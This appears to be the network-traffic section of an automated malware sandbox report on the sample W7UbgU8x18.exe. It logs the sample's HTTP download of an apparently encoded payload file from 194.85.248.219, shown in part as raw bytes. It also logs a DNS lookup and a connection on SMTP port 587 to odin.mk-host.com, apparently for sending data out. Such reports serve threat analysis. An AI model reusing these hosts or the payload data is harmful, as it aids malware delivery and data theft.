                                                                                            Nov 25, 2021 15:00:21.743369102 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.743371964 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.743403912 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.743415117 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.743423939 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.743428946 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.743438005 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.743459940 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.743470907 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.743489981 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.743504047 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.743521929 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.743537903 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.743558884 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.743580103 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.743596077 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.743614912 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.743647099 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.743680000 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.743689060 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.743699074 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.743705034 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.743712902 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.743736982 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.743745089 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.743761063 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.743792057 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.743825912 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.743838072 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.743849039 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.743858099 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.743879080 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.743894100 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.743907928 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.743932009 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.743957996 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.743966103 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.743988991 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.743999958 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.744014978 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.744030952 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.744048119 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.744064093 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.744083881 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.744097948 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.744113922 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.744131088 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.744147062 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.744163990 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.744180918 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.744198084 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.744232893 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.744256020 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.744267941 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.744266033 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.744299889 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.744316101 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.744323969 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.744335890 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.744369030 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.744388103 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.744400978 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.744420052 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.744427919 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.744522095 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.755748034 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.783267021 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.783379078 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.783433914 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.783485889 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.783541918 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.783545971 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.783590078 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.783598900 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.783655882 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.783662081 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.783716917 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.783775091 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.783782959 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.783830881 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.783890009 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.783895969 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.783946991 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.784001112 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.784008026 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.784058094 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.784113884 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.784142971 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.784168959 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.784224033 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.784235954 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.784285069 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.784341097 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.784347057 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.784396887 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.784452915 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.784462929 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.784513950 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.784590960 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.784635067 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.784651041 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.784677029 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.784712076 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.784718037 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.784759045 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.784789085 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.784801006 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.784868956 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.784873009 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.784924030 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.784964085 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.784986973 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.785005093 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.785046101 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.785063028 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.785089016 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.785128117 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.785140991 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.785171032 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.785207987 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.785223007 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.785248995 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.785289049 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.785298109 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.785326958 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.785365105 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.785376072 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.785404921 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.785444975 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.785454035 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.785485029 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.785521984 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.785531044 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.785561085 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.785600901 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.785609961 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.785638094 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.785676956 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.785687923 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.785717010 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.785756111 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.785762072 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.785797119 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.785835028 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.785849094 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.785875082 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.785914898 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.785923004 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.785953045 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.785991907 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.786000013 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.786031008 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.786071062 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.786081076 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.786112070 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.786149025 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.786159039 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.786190987 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.786230087 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.786245108 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.786274910 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.786318064 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.786329031 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.786358118 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.786396980 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.786406040 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.786437988 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.786474943 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.786489964 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.786514044 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.786552906 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.786562920 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.786591053 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.786628962 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.786643982 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.786668062 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.786706924 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.786720991 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.786748886 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.786787033 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.786801100 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.786824942 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.786863089 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.786901951 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.786911011 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.786953926 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.786972046 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.786993027 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.787031889 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.787041903 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.787071943 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.787110090 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.787122011 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.787149906 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.787189960 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.787201881 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.787220955 CET8049722194.85.248.219192.168.2.5
                                                                                            Nov 25, 2021 15:00:21.787271976 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:00:49.584430933 CET4972280192.168.2.5194.85.248.219
                                                                                            Nov 25, 2021 15:02:08.256266117 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:08.357487917 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:08.358764887 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:08.517106056 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:08.520540953 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:08.621891975 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:08.622282982 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:08.728094101 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:08.777755976 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:08.823992968 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:08.934140921 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:08.934175014 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:08.934195995 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:08.934210062 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:08.934348106 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:08.934407949 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:08.937367916 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:08.978523016 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:09.080740929 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:09.121315956 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:09.391123056 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:09.492496014 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:09.495181084 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:09.597073078 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:09.598547935 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:09.723249912 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:09.724236012 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:09.825455904 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:09.825968027 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:09.954533100 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:09.955056906 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:10.057502031 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:10.058862925 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:10.059082031 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:10.059964895 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:10.060137033 CET49817587192.168.2.5209.205.200.74
                                                                                            Nov 25, 2021 15:02:10.160187960 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:10.160217047 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:10.161077023 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:10.161097050 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:10.168694973 CET58749817209.205.200.74192.168.2.5
                                                                                            Nov 25, 2021 15:02:10.215203047 CET49817587192.168.2.5209.205.200.74

                                                                                            UDP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Nov 25, 2021 15:02:07.988897085 CET5853053192.168.2.58.8.8.8
                                                                                            Nov 25, 2021 15:02:08.120956898 CET53585308.8.8.8192.168.2.5

                                                                                            DNS Queries

                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                            Nov 25, 2021 15:02:07.988897085 CET192.168.2.58.8.8.80x1daStandard query (0)odin.mk-host.comA (IP address)IN (0x0001)

                                                                                            DNS Answers

                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                            Nov 25, 2021 15:02:08.120956898 CET8.8.8.8192.168.2.50x1daNo error (0)odin.mk-host.com209.205.200.74A (IP address)IN (0x0001)

                                                                                            HTTP Request Dependency Graph

                                                                                            • 194.85.248.219

                                                                                            HTTP Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            0192.168.2.549722194.85.248.21980C:\Users\user\Desktop\W7UbgU8x18.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Nov 25, 2021 15:00:19.131431103 CET253OUTGET /token_ta992i.txt HTTP/1.1
                                                                                            Host: 194.85.248.219
                                                                                            Connection: Keep-Alive
                                                                                            Nov 25, 2021 15:00:19.160027981 CET254INHTTP/1.1 200 OK
                                                                                            Content-Type: text/plain
                                                                                            Last-Modified: Wed, 24 Nov 2021 19:04:41 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            ETag: "55b9ce2266e1d71:0"
                                                                                            Server: Microsoft-IIS/10.0
                                                                                            Date: Thu, 25 Nov 2021 14:00:18 GMT
                                                                                            Content-Length: 442789
                                                                                            Data Raw: 12 22 10 39 08 2d 28 34 26 3b 24 28 39 7d 7d 7d 79 4b 49 39 18 30 12 24 36 2b 34 3c 29 6d 6d 6d 37 15 00 09 28 0d 04 14 06 1b 04 0c 19 5d 5d 5d 37 05 10 19 38 1d 14 04 16 0b 14 1c 09 4d 4d 4d 47 75 60 69 48 6d 64 74 66 7b 64 6c 79 3d 3d 3d 71 65 70 79 58 7d 01 43 42 4d 01 7c 5c 2d 02 22 6f 76 66 4a 7d 41 35 7d 51 5d 6d 7d 7b 25 1e 2b 55 69 28 76 5a 71 53 71 5e 4d 5b 75 6a 21 79 3a c2 a2 c2 b7 c2 a3 c2 81 c2 93 c2 bf c2 a7 c2 8c c2 83 c2 ad c3 91 c2 8a c2 99 c3 ab c2 88 c3 9b c2 84 c2 a1 c3 88 c2 ac c2 90 c2 bb c3 84 c2 93 c2 ad c2 ad c2 a0 c2 88 c2 ac c3 bd c2 9c c3 a7 c2 ac c2 95 c2 80 c2 89 c2 a8 c2 8d c2 84 c2 94 c2 86 c2 9b c2 87 c2 9c c2 8a c3 8d c3 9d c3 9d c2 a2 c2 85 c2 94 c2 9c c2 b8 c2 9f c2 9c c2 94 c2 bc c3 b8 c2 90 c2 9c c2 89 c3 8d c3 8d c3 8d c3 87 c3 b5 c3 a0 c3 a9 c3 88 c3 a3 c3 a4 c3 b4 c3 a6 c3 9d c3 a0 c3 a1 c3 b9 c2 ad c2 8f c2 bd c3 97 c3 a2 c3 96 c3 bc c3 98 c3 bd c3 b4 c3 ac c3 b6 c3 ab c3 b4 c3 bc c3 a9 c2 ad c2 ad c2 ad c3 b6 c3 ba c3 98 c3 8c c3 a8 c3 8d c3 84 c3 b2 c3 86 c3 9b c3 84 c3 8c c3 99 c2 9d c2 9d c2 9d c3 b7 c3 85 c3 93 c3 99 c3 b8 c3 9d c3 94 c3 a2 c3 96 c3 8b c3 94 c3 9c c3 89 c2 ab c2 8d 72 05 36 21 2e 09 2e 25 3b 27 38 25 2f 38 7e 7c 62 16 26 31 3e 19 3e 30 2b 37 1e 35 3b 28 48 6c 52 26 16 01 0e 29 0e 0d 1b 17 10 11 0b 18 5d 5c 42 36 05 11 1e 39 1e 15 0b 13 08 15 1b 0c 4e 4c 32 46 76 61 6e 49 6d 65 7b 67 78 65 6b 78 3e 3c 22 56 66 71 7e 59 70 4c 1b 77 5e 76 6a 68 2e 2c 12 66 5e 41 4b 69 4c 45 5c 47 58 45 4b 58 1e 1c 02 76 46 51 5e 79 5e 55 4b 57 48 55 5b 48 0e 0c c3 b2 c2 86 c2 bc c2 a1 c2 ab c2 89 c2 ae c2 93 c2 bb c2 a7 c2 b8 c2 a5 c2 ab c2 b8 c3 be c3 bc c3 a2 c2 96 c2 a6 c2 b1 c2 be c2 99 c2 be c2 b5 c2 ab c2 b7 c2 a8 c2 b5 c2 bb c2 a8 c3 ae c3 ac c3 92 c2 a6 c2 96 c2 81 c2 8e c2 a9 c2 8e c2 85 c2 9b c2 87 c2 98 c2 85 c2 8b c2 98 c3 9e c3 9c c3 82 c2 b6 c2 86 c2 91 c2 9e c2 b9 c2 9e c2 95 c2 8b c2 97 c2 88 c2 95 c2 9b c2 88 c3 8e c3 8c c2 b2 c3 86 c3 b6 c3 a1 c3 ae c3 89 c3 ae c3 a5 c3 bb c3 a7 c3 b8 c3 a5 c3 ab c3 b0 c2 be c2 bc c2 a2 c3 94 c3 a6 c3 b1 c3 be c3 99 c3 be c3 b5 c3 ab c3 b7 c3 a8 c3 b5 c3 bb c3 a8 c2 ae c2 ac c2 92 c3 a4 c3 94 c3 81 c3 8e c3 a9 c3 8a c3 a3 c3 9b c3 87 c3 98 c3 85 c3 8b c3 98 c2 9e c2 9c c2 82 c3 b6 c3 86 c3 91 c3 9e c3 b9 c3 9c c2 a1 c2 ba c3 8c c3 91 c3 bc c2 aa c3 88 c2 8e 73 73 16 30 3e 2a 0a 2f 2a 1c 24 39 22 2a 2d 7f 6f 63 15 27 3e 3f 1a 3f 3a 2a 34 29 32 3a 2b 6f 53 53 25 17 06 0f 2a 0d 0a 1a 04 1f 02 3e 39 70 4c 7b 2d 31 16 1f 3a 1d 1a 0d 14 09 12 1a 2d 4f 3f 33 45 77 7e 6f 4a 6f 69 5a 64 4f 62 6a 7b 3f 23 23 55 67 76 7f 5a 7f 7a 6a 74 69 71 7a 6b 2f 10 13 68 78 4d 62 49 49 32 71 44 59 42 46 5b 1f 03 03 75 4d 56 5a 7a 5f 5a 48 54 49 52 5a 53 0f c3 bf c3 b3 c2 85 c2 b7 c2 a6 c2 af c2 8a c2 af c2 aa c2 ba c2 a4 c2 b9 c2 a2 c2 aa c2 bb c3 bf c3 a3 c3 a3 c2 85 c2 a7 c2 b6 c2 bf c2 8a c2 99 c2 ba c2 aa c2 b4 c2 a9 c2 b2 c2 ba c2 ab c3 af c3 93 c3 93 c2 a5 c2 97 c2 86 c2 8f c2 aa c2 8f c2 8a c2 9a c2 84 c2 99 c2 82 c2 ac c2 be c3 b9 c3 8f c3 83 c2 b5 c2 87 c2 96 c2 9f c2 ba c2 9b c2 bc c2 8a c2 94 c2 89 c2 92 c2 98 c2 8b c3 8f c2 a7 c2 b3 c3 ab c3 bf c2 9f c3 ad c3 8a c3 ab c3 91 c3 96 c3 a4 c3 b9 c3 a2 c3 af c3 bb c2 bf c2 a3 c2 a3 c3 93 c3 b7 c3 b6 c3 bf c3 99 c3 99 c3 ba c3 aa c3 b4 c3 a9 c3 b2 c3 ba c3 ab c2 af c2 93 c2 93 c3 a5 c3 97 c3 86 c3 8f c3 aa c3 8f c3 8a c3 9a c3 84 c3 99 c3
